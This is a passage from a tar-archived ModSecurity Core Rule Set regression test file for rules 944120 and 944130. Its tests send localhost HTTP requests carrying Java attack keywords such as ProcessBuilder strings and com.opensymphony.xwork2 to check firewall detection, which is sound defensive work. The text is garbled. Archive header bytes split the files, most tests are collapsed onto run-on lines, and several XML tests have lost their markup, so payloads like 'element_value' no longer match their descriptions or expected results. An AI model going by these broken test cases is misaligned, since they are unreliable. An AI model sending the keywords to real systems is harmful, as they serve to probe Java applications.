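    # matches the plain application/json arg-value test (944120-113).
    desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"test": "ProcessBuilder.evil.prototypeserializationfactory"}
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
  # 944120-117: multipart/form-data part declared as application/xml.
  # NOTE(review): no XML tags surround the keyword in this part body although
  # the desc says "XML element value"; confirm the payload against the
  # upstream test file.
  - test_title: 944120-117
    desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/xml

              ProcessBuilder.evil.prototypeserializationfactory
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
- test_title: 944120-118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: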
"ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-119 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-120 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure=test" output: log_contains: "id \"944120\"" - test_title: 944120-121 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" 
port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.whileclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-122 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.whileclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-123 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.whileclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-124 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-125 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-126 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-127 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: 
"HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-128 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-129 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-130 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.whileclosure\"}" output: log_contains: "id \"944120\"" - test_title: 944120-131 desc: "Content-Type application/json arg name 
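includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.whileclosure\": \"test\"}" output: log_contains: "id \"944120\""
  # 944120-132: multipart/form-data part carrying JSON with the keyword as the
  # JSON *key* (arg name).
  - test_title: 944120-132
    desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"ProcessBuilder.evil.whileclosure": "test"}
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
  # 944120-133: same request shape, but the keyword is placed in the JSON
  # *value* so the arg-value position is exercised separately from the
  # arg-name test above (944120-132); this matches the plain application/json
  # arg-value test (944120-130).
  - test_title: 944120-133
    desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"test": "ProcessBuilder.evil.whileclosure"}
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
  # 944120-134: multipart/form-data part declared as application/xml.
  # NOTE(review): no XML tags surround the keyword in this part body although
  # the desc says "XML element value", and 944120-135 below reads identically
  # in this copy; confirm both payloads against the upstream test file.
  - test_title: 944120-134
    desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/xml

              ProcessBuilder.evil.whileclosure
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
  - test_title: 944120-135
    desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/xml

              ProcessBuilder.evil.whileclosure
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""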
����������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml��������0000664�0000000�0000000�00001256264�14461225151�0027706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944130.yaml" description: "Positive tests for rule 944130" tests: - test_title: 944130-0 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-1 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "com.opensymphony.xwork2=test" output: log_contains: "id \"944130\"" - test_title: 944130-2 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - stage: input: 
dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=com.opensymphony.xwork2 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-3 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: com.opensymphony.xwork2=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-4 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: com.opensymphony.xwork2 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-5 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-6 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-7 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-8 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: 
"HTTP/1.0" data: "test=com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-9 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"com.opensymphony.xwork2\"}" output: log_contains: "id \"944130\"" - test_title: 944130-10 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"com.opensymphony.xwork2\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-11 desc: "Argument test includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-12 desc: "Argument name includes keyword com.sun.org.apache" stages: - stage: input: 
dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "com.sun.org.apache=test" output: log_contains: "id \"944130\"" - test_title: 944130-13 desc: "Cookie test includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=com.sun.org.apache method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-14 desc: "Cookie name includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: com.sun.org.apache=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-15 desc: "Request header test includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: com.sun.org.apache method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-16 desc: "XML attribute value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-17 desc: "XML element value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-18 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 
944130-19 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-20 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"com.sun.org.apache\"}" output: log_contains: "id \"944130\"" - test_title: 944130-21 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"com.sun.org.apache\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-22 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
